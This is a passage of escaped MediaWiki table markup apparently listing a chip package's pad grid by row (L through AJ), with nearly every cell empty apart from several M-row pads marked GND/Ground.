L3 || || <br /> |-<br /> | L4 || || <br /> |-<br /> | L5 || || <br /> |-<br /> | L6 || || <br /> |-<br /> | L7 || || <br /> |-<br /> | L8 || || <br /> |-<br /> | L9 || || <br /> |-<br /> | L10 || || <br /> |-<br /> | L11 || || <br /> |-<br /> | L12 || || <br /> |-<br /> | L13 || || <br /> |-<br /> | L14 || || <br /> |-<br /> | L15 || || <br /> |-<br /> | L16 || || <br /> |-<br /> | L17 || || <br /> |-<br /> | L18 || || <br /> |-<br /> | L19 || || <br /> |-<br /> | L20 || || <br /> |-<br /> | L21 || || <br /> |-<br /> | L22 || || <br /> |-<br /> | L23 || || <br /> |-<br /> | L24 || || <br /> |-<br /> | L25 || || <br /> |-<br /> | L26 || || <br /> |-<br /> | L27 || || <br /> |-<br /> | L28 || || <br /> |-<br /> | L29 || || <br /> |-<br /> | L30 || || <br /> |-<br /> | L31 || || <br /> |-<br /> | L32 || || <br /> |-<br /> | L33 || || <br /> |-<br /> | L34 || || <br /> |-<br /> | L35 || || <br /> |-<br /> | L36 || || <br /> |-<br /> | L37 || || <br /> |-<br /> | L38 || || <br /> |-<br /> | L39 || || <br /> |-<br /> | L40 || || <br /> |-<br /> | L41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | M<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | M3 || || <br /> |-<br /> | M4 || || <br /> |-<br /> | M5 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M6 || || <br /> |-<br /> | M7 || || <br /> |-<br /> | M8 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M10 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M12 || || <br /> |-<br /> | M13 || || <br /> |-<br /> | M14 || || <br /> |-<br /> | M15 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M16 || || <br /> |-<br /> | M17 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M18 || || <br /> |-<br /> | M19 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M20 || || <br /> |-<br /> | M21 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M22 || || <br /> |-<br /> | M23 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M24 || || <br /> |-<br /> | M25 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M26 || || <br /> |-<br /> | M27 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M28 || || <br /> |-<br /> | M30 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M32 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M34 || || <br /> |-<br /> | M35 || || <br /> |-<br /> | M36 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M37 || style=&quot;color:white; background-color:#333333;&quot; | GND || style=&quot;color:white; background-color:#333333;&quot; | Ground<br /> |-<br /> | M38 || || <br /> |-<br /> | M39 || || <br /> |-<br /> | M40 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | N<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | N1 || || <br /> |-<br /> | N2 || || <br /> |-<br /> | N3 || || <br /> |-<br /> | N4 || || <br /> |-<br /> | N5 || || <br /> |-<br /> | N6 || || <br /> |-<br /> | N7 || || <br /> |-<br /> | N8 || || <br /> |-<br /> | N9 || || <br /> |-<br /> | N10 || || <br /> |-<br /> | N11 || || <br /> |-<br /> | N12 || || <br /> |-<br /> | N13 || || <br /> |-<br /> | N14 || || <br /> |-<br /> | N15 || || <br /> |-<br /> | N16 || || <br /> |-<br /> | N17 || || <br /> |-<br /> | N18 || || <br /> |-<br /> | N19 || || <br /> |-<br /> | N20 || || <br /> |-<br /> | N21 || || <br /> |-<br /> | N22 || || <br /> |-<br /> | N23 || || <br /> |-<br /> | N24 || || <br /> |-<br /> | N25 || || <br /> |-<br /> | N26 || || <br /> |-<br /> | N27 || || <br /> |-<br /> | N28 || || <br /> |-<br /> | N29 || || <br /> |-<br /> | N30 || || <br /> |-<br /> | N31 || || <br /> |-<br /> | N32 || || <br /> |-<br /> | N33 || || <br /> |-<br /> | N34 || || <br /> |-<br /> | N35 || || <br /> |-<br /> | N36 || || <br /> |-<br /> | N37 || || <br /> |-<br /> | N38 || || <br /> |-<br /> | N39 || || <br /> |-<br /> | N40 || || <br /> |-<br /> | N41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | P<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | P1 || || <br /> |-<br /> | P2 || || <br /> |-<br /> | P3 || || <br /> |-<br /> | P4 || || <br /> |-<br /> | P5 || || <br /> |-<br /> | P6 || || <br /> |-<br /> | P7 || || <br /> |-<br /> | P8 || || <br /> |-<br /> | P9 || || <br /> |-<br /> | P10 || || <br /> |-<br /> | P11 || || <br /> |-<br /> | P12 || || <br /> |-<br /> | P13 || || <br /> |-<br /> | P14 || || <br /> |-<br /> | P15 || || <br /> |-<br /> | P16 || || <br /> |-<br /> | P17 || || <br /> |-<br /> | P18 || || <br /> |-<br /> | P19 || || <br /> |-<br /> | P20 || || <br /> |-<br /> | P21 || || <br /> |-<br /> | P22 || || <br /> |-<br /> | P23 || || <br /> |-<br /> | P24 || || <br /> |-<br /> | P25 || || <br /> |-<br /> | P26 || || <br /> |-<br /> | P27 || || <br /> |-<br /> | P28 || || <br /> |-<br /> | P29 || || <br /> |-<br /> | P30 || || <br /> |-<br /> | P31 || || <br /> |-<br /> | P32 || || <br /> |-<br /> | P33 || || <br /> |-<br /> | P34 || || <br /> |-<br /> | P35 || || <br /> |-<br /> | P36 || || <br /> |-<br /> | P37 || || <br /> |-<br /> | P38 || || <br /> |-<br /> | P39 || || <br /> |-<br /> | P40 || || <br /> |-<br /> | P41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | R<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | R1 || || <br /> |-<br /> | R2 || || <br /> |-<br /> | R3 || || <br /> |-<br /> | R4 || || <br /> |-<br /> | R5 || || <br /> |-<br /> | R6 || || <br /> |-<br /> | R7 || || <br /> |-<br /> | R8 || || <br /> |-<br /> | R9 || || <br /> |-<br /> | R10 || || <br /> |-<br /> | R11 || || <br /> |-<br /> | R12 || || <br /> |-<br /> | R13 || || <br /> |-<br /> | R14 || || <br /> |-<br /> | R15 || || <br /> |-<br /> | R16 || || <br /> |-<br /> | R17 || || <br /> |-<br /> | R18 || || <br /> |-<br /> | R19 || || <br /> |-<br /> | R20 || || <br /> |-<br /> | R21 || || <br /> |-<br /> | R22 || || <br /> |-<br /> | R23 || || <br /> |-<br /> | R24 || || <br /> |-<br /> | R25 || || <br /> |-<br /> | R26 || || <br /> |-<br /> | R27 || || <br /> |-<br /> | R28 || || <br /> |-<br /> | R29 || || <br /> |-<br /> | R30 || || <br /> |-<br /> | R31 || || <br /> |-<br /> | R32 || || <br /> |-<br /> | R33 || || <br /> |-<br /> | R34 || || <br /> |-<br /> | R35 || || <br /> |-<br /> | R36 || || <br /> |-<br /> | R37 || || <br /> |-<br /> | R38 || || <br /> |-<br /> | R39 || || <br /> |-<br /> | R40 || || <br /> |-<br /> | R41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | T<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | T1 || || <br /> |-<br /> | T2 || || <br /> |-<br /> | T3 || || <br /> |-<br /> | T4 || || <br /> |-<br /> | T5 || || <br /> |-<br /> | T6 || || <br /> |-<br /> | T7 || || <br /> |-<br /> | T8 || || <br /> |-<br /> | T9 || || <br /> |-<br /> | T10 || || <br /> |-<br /> | T11 || || <br /> |-<br /> | T12 || || <br /> |-<br /> | T13 || || <br /> |-<br /> | T14 || || <br /> |-<br /> | T15 || || <br /> |-<br /> | T16 || || <br /> |-<br /> | T17 || || <br /> |-<br /> | T18 || || <br /> |-<br /> | T19 || || <br /> |-<br /> | T20 || || <br /> |-<br /> | T21 || || <br /> |-<br /> | T22 || || <br /> |-<br /> | T23 || || <br /> |-<br /> | T24 || || <br /> |-<br /> | T25 || || <br /> |-<br /> | T26 || || <br /> |-<br /> | T27 || || <br /> |-<br /> | T28 || || <br /> |-<br /> | T29 || || <br /> |-<br /> | T30 || || <br /> |-<br /> | T31 || || <br /> |-<br /> | T32 || || <br /> |-<br /> | T33 || || <br /> |-<br /> | T34 || || <br /> |-<br /> | T35 || || <br /> |-<br /> | T36 || || <br /> |-<br /> | T37 || || <br /> |-<br /> | T38 || || <br /> |-<br /> | T39 || || <br /> |-<br /> | T40 || || <br /> |-<br /> | T41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | U<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | U1 || || <br /> |-<br /> | U2 || || <br /> |-<br /> | U3 || || <br /> |-<br /> | U4 || || <br /> |-<br /> | U5 || || <br /> |-<br /> | U6 || || <br /> |-<br /> | U7 || || <br /> |-<br /> | U8 || || <br /> |-<br /> | U9 || || <br /> |-<br /> | U10 || || <br /> |-<br /> | U11 || || <br /> |-<br /> | U12 || || <br /> |-<br /> | U13 || || <br /> |-<br /> | U14 || || <br /> |-<br /> | U15 || || <br /> |-<br /> | U16 || || <br /> |-<br /> | U17 || || <br /> |-<br /> | U18 || || <br /> |-<br /> | U19 || || <br /> |-<br /> | U20 || || <br /> |-<br /> | U21 || || <br /> |-<br /> | U22 || || <br /> |-<br /> | U23 || || <br /> |-<br /> | U24 || || <br /> |-<br /> | U25 || || <br /> |-<br /> | U26 || || <br /> |-<br /> | U27 || || <br /> |-<br /> | U28 || || <br /> |-<br /> | U29 || || <br /> |-<br /> | U30 || || <br /> |-<br /> | U31 || || <br /> |-<br /> | U32 || || <br /> |-<br /> | U33 || || <br /> |-<br /> | U34 || || <br /> |-<br /> | U35 || || <br /> |-<br /> | U36 || || <br /> |-<br /> | U37 || || <br /> |-<br /> | U38 || || <br /> |-<br /> | U39 || || <br /> |-<br /> | U40 || || <br /> |-<br /> | U41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | V<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | V1 || || <br /> |-<br /> | V2 || || <br /> |-<br /> | V3 || || <br /> |-<br /> | V4 || || <br /> |-<br /> | V5 || || <br /> |-<br /> | V6 || || <br /> |-<br /> | V7 || || <br /> |-<br /> | V8 || || <br /> |-<br /> | V9 || || <br /> |-<br /> | V10 || || <br /> |-<br /> | V11 || || <br /> |-<br /> | V12 || || <br /> |-<br /> | V13 || || <br /> |-<br /> | V14 || || <br /> |-<br /> | V15 || || <br /> |-<br /> | V16 || || <br /> |-<br /> | V17 || || <br /> |-<br /> | V18 || || <br /> |-<br /> | V19 || || <br /> |-<br /> | V20 || || <br /> |-<br /> | V21 || || <br /> |-<br /> | V22 || || <br /> |-<br /> | V23 || || <br /> |-<br /> | V24 || || <br /> |-<br /> | V25 || || <br /> |-<br /> | V26 || || <br /> |-<br /> | V27 || || <br /> |-<br /> | V28 || || <br /> |-<br /> | V29 || || <br /> |-<br /> | V30 || || <br /> |-<br /> | V31 || || <br /> |-<br /> | V32 || || <br /> |-<br /> | V33 || || <br /> |-<br /> | V34 || || <br /> |-<br /> | V35 || || <br /> |-<br /> | V36 || || <br /> |-<br /> | V37 || || <br /> |-<br /> | V38 || || <br /> |-<br /> | V39 || || <br /> |-<br /> | V40 || || <br /> |-<br /> | V41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | W<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | W1 || || <br /> |-<br /> | W2 || || <br /> |-<br /> | W3 || || <br /> |-<br /> | W4 || || <br /> |-<br /> | W5 || || <br /> |-<br /> | W6 || || <br /> |-<br /> | W7 || || <br /> |-<br /> | W8 || || <br /> |-<br /> | W9 || || <br /> |-<br /> | W10 || || <br /> |-<br /> | W11 || || <br /> |-<br /> | W12 || || <br /> |-<br /> | W13 || || <br /> |-<br /> | W14 || || <br /> |-<br /> | W15 || || <br /> |-<br /> | W16 || || <br /> |-<br /> | W17 || || <br /> |-<br /> | W18 || || <br /> |-<br /> | W19 || || <br /> |-<br /> | W20 || || <br /> |-<br /> | W21 || || <br /> |-<br /> | W22 || || <br /> |-<br /> | W23 || || <br /> |-<br /> | W24 || || <br /> |-<br /> | W25 || || <br /> |-<br /> | W26 || || <br /> |-<br /> | W27 || || <br /> |-<br /> | W28 || || <br /> |-<br /> | W29 || || <br /> |-<br /> | W30 || || <br /> |-<br /> | W31 || || <br /> |-<br /> | W32 || || <br /> |-<br /> | W33 || || <br /> |-<br /> | W34 || || <br /> |-<br /> | W35 || || <br /> |-<br /> | W36 || || <br /> |-<br /> | W37 || || <br /> |-<br /> | W38 || || <br /> |-<br /> | W39 || || <br /> |-<br /> | W40 || || <br /> |-<br /> | W41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | Y<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | Y1 || || <br /> |-<br /> | Y2 || || <br /> |-<br /> | Y3 || || <br /> |-<br /> | Y4 || || <br /> |-<br /> | Y5 || || <br /> |-<br /> | Y6 || || <br /> |-<br /> | Y7 || || <br /> |-<br /> | Y8 || || <br /> |-<br /> | Y9 || || <br /> |-<br /> | Y10 || || <br /> |-<br /> | Y11 || || <br /> |-<br /> | Y12 || || <br /> |-<br /> | Y13 || || <br /> |-<br /> | Y14 || || <br /> |-<br /> | Y15 || || <br /> |-<br /> | Y16 || || <br /> |-<br /> | Y17 || || <br /> |-<br /> | Y18 || || <br /> |-<br /> | Y19 || || <br /> |-<br /> | Y20 || || <br /> |-<br /> | Y21 || || <br /> |-<br /> | Y22 || || <br /> |-<br /> | Y23 || || <br /> |-<br /> | Y24 || || <br /> |-<br /> | Y25 || || <br /> |-<br /> | Y26 || || <br /> |-<br /> | Y27 || || <br /> |-<br /> | Y28 || || <br /> |-<br /> | Y29 || || <br /> |-<br /> | Y30 || || <br /> |-<br /> | Y31 || || <br /> |-<br /> | Y32 || || <br /> |-<br /> | Y33 || || <br /> |-<br /> | Y34 || || <br /> |-<br /> | Y35 || || <br /> |-<br /> | Y36 || || <br /> |-<br /> | Y37 || || <br /> |-<br /> | Y38 || || <br /> |-<br /> | Y39 || || <br /> |-<br /> | Y40 || || <br /> |-<br /> | Y41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | Z<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | Z1 || || <br /> |-<br /> | Z2 || || <br /> |-<br /> | Z3 || || <br /> |-<br /> | Z4 || || <br /> |-<br /> | Z5 || || <br /> |-<br /> | Z6 || || <br /> |-<br /> | Z7 || || <br /> |-<br /> | Z8 || || <br /> |-<br /> | Z9 || || <br /> |-<br /> | Z10 || || <br /> |-<br /> | Z11 || || <br /> |-<br /> | Z12 || || <br /> |-<br /> | Z13 || || <br /> |-<br /> | Z14 || || <br /> |-<br /> | Z15 || || <br /> |-<br /> | Z16 || || <br /> |-<br /> | Z17 || || <br /> |-<br /> | Z18 || || <br /> |-<br /> | Z19 || || <br /> |-<br /> | Z20 || || <br /> |-<br /> | Z21 || || <br /> |-<br /> | Z22 || || <br /> |-<br /> | Z23 || || <br /> |-<br /> | Z24 || || <br /> |-<br /> | Z25 || || <br /> |-<br /> | Z26 || || <br /> |-<br /> | Z27 || || <br /> |-<br /> | Z28 || || <br /> |-<br /> | Z29 || || <br /> |-<br /> | Z30 || || <br /> |-<br /> | Z31 || || <br /> |-<br /> | Z32 || || <br /> |-<br /> | Z33 || || <br /> |-<br /> | Z34 || || <br /> |-<br /> | Z35 || || <br /> |-<br /> | Z36 || || <br /> |-<br /> | Z37 || || <br /> |-<br /> | Z38 || || <br /> |-<br /> | Z39 || || <br /> |-<br /> | Z40 || || <br /> |-<br /> | Z41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AA<br /> |-! Pad # !! Name !! Description<br /> |-<br /> | AA1 || ||<br /> |-<br /> | AA2 || ||<br /> |-<br /> | AA3 || ||<br /> |-<br /> | AA4 || ||<br /> |-<br /> | AA5 || ||<br /> |-<br /> | AA6 || ||<br /> |-<br /> | AA7 || ||<br /> |-<br /> | AA8 || || <br /> |-<br /> | AA9 || ||<br /> |-<br /> | AA10 || || <br /> |-<br /> | AA11 || ||<br /> |-<br /> | AA12 || || <br /> |-<br /> | AA13 || ||<br /> |-<br /> | AA14 || || <br /> |-<br /> | AA15 || || <br /> |-<br /> | AA16 || || <br /> |-<br /> | AA17 || || <br /> |-<br /> | AA18 || || <br /> |-<br /> | AA19 || || <br /> |-<br /> | AA20 || || <br /> |-<br /> | AA21 || || <br /> |-<br /> | AA22 || || <br /> |-<br /> | AA23 || || <br /> |-<br /> | AA24 || || <br /> |-<br /> | AA25 || || <br /> |-<br /> | AA26 || || <br /> |-<br /> | AA27 || || <br /> |-<br /> | AA28 || || <br /> |-<br /> | AA29 || || <br /> |-<br /> | AA30 || || <br /> |-<br /> | AA31 || || <br /> |-<br /> | AA32 || || <br /> |-<br /> | AA33 || || <br /> |-<br /> | AA34 || || <br /> |-<br /> | AA35 || || <br /> |-<br /> | AA36 || || <br /> |-<br /> | AA37 || || <br /> |-<br /> | AA38 || || <br /> |-<br /> | AA39 || || <br /> |-<br /> | AA40 || || <br /> |-<br /> | AA41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AB<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AB1 || || <br /> |-<br /> | AB2 || || <br /> |-<br /> | AB3 || || <br /> |-<br /> | AB4 || || <br /> |-<br /> | AB5 || || <br /> |-<br /> | AB6 || || <br /> |-<br /> | AB8 || || <br /> |-<br /> | AB10 || || <br /> |-<br /> | AB11 || || <br /> |-<br /> | AB12 || || <br /> |-<br /> | AB13 || || <br /> |-<br /> | AB14 || || <br /> |-<br /> | AB15 || || <br /> |-<br /> | AB16 || || <br /> |-<br /> | AB17 || || <br /> |-<br /> | AB18 || || <br /> |-<br /> | AB19 || || <br /> |-<br /> | AB20 || || <br /> |-<br /> | AB21 || || <br /> |-<br /> | AB22 || || <br /> |-<br /> | AB23 || || <br /> |-<br /> | AB24 || || <br /> |-<br /> | AB25 || || <br /> |-<br /> | AB26 || || <br /> |-<br /> | AB27 || || <br /> |-<br /> | AB28 || || <br /> |-<br /> | AB29 || || <br /> |-<br /> | AB30 || || <br /> |-<br /> | AB31 || || <br /> |-<br /> | AB32 || || <br /> |-<br /> | AB33 || || <br /> |-<br /> | AB34 || || <br /> |-<br /> | AB35 || || <br /> |-<br /> | AB36 || || <br /> |-<br /> | AB37 || || <br /> |-<br /> | AB38 || || <br /> |-<br /> | AB39 || || <br /> |-<br /> | AB40 || || <br /> |-<br /> | AB41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AC<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AC1 || || <br /> |-<br /> | AC2 || || <br /> |-<br /> | AC3 || || <br /> |-<br /> | AC4 || || <br /> |-<br /> | AC5 || || <br /> |-<br /> | AC6 || || <br /> |-<br /> | AC7 || || <br /> |-<br /> | AC8 || || <br /> |-<br /> | AC9 || || <br /> |-<br /> | AC10 || || <br /> |-<br /> | AC11 || || <br /> |-<br /> | AC12 || || <br /> |-<br /> | AC13 || || <br /> |-<br /> | AC14 || || <br /> |-<br /> | AC15 || || <br /> |-<br /> | AC16 || || <br /> |-<br /> | AC17 || || <br /> |-<br /> | AC18 || || <br /> |-<br /> | AC19 || || <br /> |-<br /> | AC20 || || <br /> |-<br /> | AC21 || || <br /> |-<br /> | AC22 || || <br /> |-<br /> | AC23 || || <br /> |-<br /> | AC24 || || <br /> |-<br /> | AC25 || || <br /> |-<br /> | AC26 || || <br /> |-<br /> | AC27 || || <br /> |-<br /> | AC28 || || <br /> |-<br /> | AC29 || || <br /> |-<br /> | AC30 || || <br /> |-<br /> | AC31 || || <br /> |-<br /> | AC32 || || <br /> |-<br /> | AC33 || || <br /> |-<br /> | AC34 || || <br /> |-<br /> | AC35 || || <br /> |-<br /> | AC36 || || <br /> |-<br /> | AC37 || || <br /> |-<br /> | AC38 || || <br /> |-<br /> | AC39 || || <br /> |-<br /> | AC40 || || <br /> |-<br /> | AC41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AD<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AD1 || || <br /> |-<br /> | AD2 || || <br /> |-<br /> | AD3 || || <br /> |-<br /> | AD4 || || <br /> |-<br /> | AD5 || || <br /> |-<br /> | AD6 || || <br /> |-<br /> | AD7 || || <br /> |-<br /> | AD8 || || <br /> |-<br /> | AD9 || || <br /> |-<br /> | AD10 || || <br /> |-<br /> | AD11 || || <br /> |-<br /> | AD12 || || <br /> |-<br /> | AD13 || || <br /> |-<br /> | AD14 || || <br /> |-<br /> | AD15 || || <br /> |-<br /> | AD16 || || <br /> |-<br /> | AD17 || || <br /> |-<br /> | AD18 || || <br /> |-<br /> | AD19 || || <br /> |-<br /> | AD20 || || <br /> |-<br /> | AD21 || || <br /> |-<br /> | AD22 || || <br /> |-<br /> | AD23 || || <br /> |-<br /> | AD24 || || <br /> |-<br /> | AD25 || || <br /> |-<br /> | AD26 || || <br /> |-<br /> | AD27 || || <br /> |-<br /> | AD28 || || <br /> |-<br /> | AD29 || || <br /> |-<br /> | AD30 || || <br /> |-<br /> | AD31 || || <br /> |-<br /> | AD32 || || <br /> |-<br /> | AD33 || || <br /> |-<br /> | AD34 || || <br /> |-<br /> | AD35 || || <br /> |-<br /> | AD36 || || <br /> |-<br /> | AD37 || || <br /> |-<br /> | AD38 || || <br /> |-<br /> | AD39 || || <br /> |-<br /> | AD40 || || <br /> |-<br /> | AD41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AE<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AE1 || || <br /> |-<br /> | AE2 || || <br /> |-<br /> | AE3 || || <br /> |-<br /> | AE4 || || <br /> |-<br /> | AE5 || || <br /> |-<br /> | AE6 || || <br /> |-<br /> | AE7 || || <br /> |-<br /> | AE8 || || <br /> |-<br /> | AE9 || || <br /> |-<br /> | AE10 || || <br /> |-<br /> | AE11 || || <br /> |-<br /> | AE12 || || <br /> |-<br /> | AE13 || || <br /> |-<br /> | AE14 || || <br /> |-<br /> | AE15 || || <br /> |-<br /> | AE16 || || <br /> |-<br /> | AE17 || || <br /> |-<br /> | AE18 || || <br /> |-<br /> | AE19 || || <br /> |-<br /> | AE20 || || <br /> |-<br /> | AE21 || || <br /> |-<br /> | AE22 || || <br /> |-<br /> | AE23 || || <br /> |-<br /> | AE24 || || <br /> |-<br /> | AE25 || || <br /> |-<br /> | AE26 || || <br /> |-<br /> | AE27 || || <br /> |-<br /> | AE28 || || <br /> |-<br /> | AE29 || || <br /> |-<br /> | AE30 || || <br /> |-<br /> | AE31 || || <br /> |-<br /> | AE32 || || <br /> |-<br /> | AE33 || || <br /> |-<br /> | AE34 || || <br /> |-<br /> | AE35 || || <br /> |-<br /> | AE36 || || <br /> |-<br /> | AE37 || || <br /> |-<br /> | AE38 || || <br /> |-<br /> | AE39 || || <br /> |-<br /> | AE40 || || <br /> |-<br /> | AE41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AF<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AF1 || || <br /> |-<br /> | AF2 || || <br /> |-<br /> | AF3 || || <br /> |-<br /> | AF4 || || <br /> |-<br /> | AF5 || || <br /> |-<br /> | AF6 || || <br /> |-<br /> | AF7 || || <br /> |-<br /> | AF8 || || <br /> |-<br /> | AF9 || || <br /> |-<br /> | AF10 || || <br /> |-<br /> | AF11 || || <br /> |-<br /> | AF12 || || <br /> |-<br /> | AF13 || || <br /> |-<br /> | AF14 || || <br /> |-<br /> | AF15 || || <br /> |-<br /> | AF16 || || <br /> |-<br /> | AF17 || || <br /> |-<br /> | AF18 || || <br /> |-<br /> | AF19 || || <br /> |-<br /> | AF20 || || <br /> |-<br /> | AF21 || || <br /> |-<br /> | AF22 || || <br /> |-<br /> | AF23 || || <br /> |-<br /> | AF24 || || <br /> |-<br /> | AF25 || || <br /> |-<br /> | AF26 || || <br /> |-<br /> | AF27 || || <br /> |-<br /> | AF28 || || <br /> |-<br /> | AF29 || || <br /> |-<br /> | AF30 || || <br /> |-<br /> | AF31 || || <br /> |-<br /> | AF32 || || <br /> |-<br /> | AF33 || || <br /> |-<br /> | AF34 || || <br /> |-<br /> | AF35 || || <br /> |-<br /> | AF36 || || <br /> |-<br /> | AF37 || || <br /> |-<br /> | AF38 || || <br /> |-<br /> | AF39 || || <br /> |-<br /> | AF40 || || <br /> |-<br /> | AF41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AG<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AG1 || || <br /> |-<br /> | AG2 || || <br /> |-<br /> | AG3 || || <br /> |-<br /> | AG4 || || <br /> |-<br /> | AG5 || || <br /> |-<br /> | AG6 || || <br /> |-<br /> | AG7 || || <br /> |-<br /> | AG8 || || <br /> |-<br /> | AG9 || || <br /> |-<br /> | AG10 || || <br /> |-<br /> | AG11 || || <br /> |-<br /> | AG12 || || <br /> |-<br /> | AG13 || || <br /> |-<br /> | AG14 || || <br /> |-<br /> | AG15 || || <br /> |-<br /> | AG16 || || <br /> |-<br /> | AG17 || || <br /> |-<br /> | AG18 || || <br /> |-<br /> | AG19 || || <br /> |-<br /> | AG20 || || <br /> |-<br /> | AG21 || || <br /> |-<br /> | AG22 || || <br /> |-<br /> | AG23 || || <br /> |-<br /> | AG24 || || <br /> |-<br /> | AG25 || || <br /> |-<br /> | AG26 || || <br /> |-<br /> | AG27 || || <br /> |-<br /> | AG28 || || <br /> |-<br /> | AG29 || || <br /> |-<br /> | AG30 || || <br /> |-<br /> | AG31 || || <br /> |-<br /> | AG32 || || <br /> |-<br /> | AG33 || || <br /> |-<br /> | AG34 || || <br /> |-<br /> | AG35 || || <br /> |-<br /> | AG36 || || <br /> |-<br /> | AG37 || || <br /> |-<br /> | AG38 || || <br /> |-<br /> | AG39 || || <br /> |-<br /> | AG40 || || <br /> |-<br /> | AG41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AH<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AH1 || || <br /> |-<br /> | AH2 || || <br /> |-<br /> | AH3 || || <br /> |-<br /> | AH4 || || <br /> |-<br /> | AH5 || || <br /> |-<br /> | AH6 || || <br /> |-<br /> | AH7 || || <br /> |-<br /> | AH8 || || <br /> |-<br /> | AH9 || || <br /> |-<br /> | AH10 || || <br /> |-<br /> | AH11 || || <br /> |-<br /> | AH12 || || <br /> |-<br /> | AH13 || || <br /> |-<br /> | AH14 || || <br /> |-<br /> | AH15 || || <br /> |-<br /> | AH16 || || <br /> |-<br /> | AH17 || || <br /> |-<br /> | AH18 || || <br /> |-<br /> | AH19 || || <br /> |-<br /> | AH20 || || <br /> |-<br /> | AH21 || || <br /> |-<br /> | AH22 || || <br /> |-<br /> | AH23 || || <br /> |-<br /> | AH24 || || <br /> |-<br /> | AH25 || || <br /> |-<br /> | AH26 || || <br /> |-<br /> | AH27 || || <br /> |-<br /> | AH28 || || <br /> |-<br /> | AH29 || || <br /> |-<br /> | AH30 || || <br /> |-<br /> | AH31 || || <br /> |-<br /> | AH32 || || <br /> |-<br /> | AH33 || || <br /> |-<br /> | AH34 || || <br /> |-<br /> | AH35 || || <br /> |-<br /> | AH36 || || <br /> |-<br /> | AH37 || || <br /> |-<br /> | AH38 || || <br /> |-<br /> | AH39 || || <br /> |-<br /> | AH40 || || <br /> |-<br /> | AH41 || || <br /> |-<br /> |- bgcolor=&quot;#cccccc&quot;<br /> ! colspan=&quot;3&quot; | AJ<br /> |-<br /> ! Pad # !! Name !! Description<br /> |-<br /> | AJ1 || || <br /> |-<br /> | AJ2 || || <br /> |-<br /> | AJ3 || || <br /> |-<br /> | AJ4 || || <br /> |-<br /> | AJ5 || || <br /> |-<br /> | AJ6 || || <br /> |-<br /> | AJ7 || || <br /> |-<br /> | AJ8 || || <br /> |-<br /> | 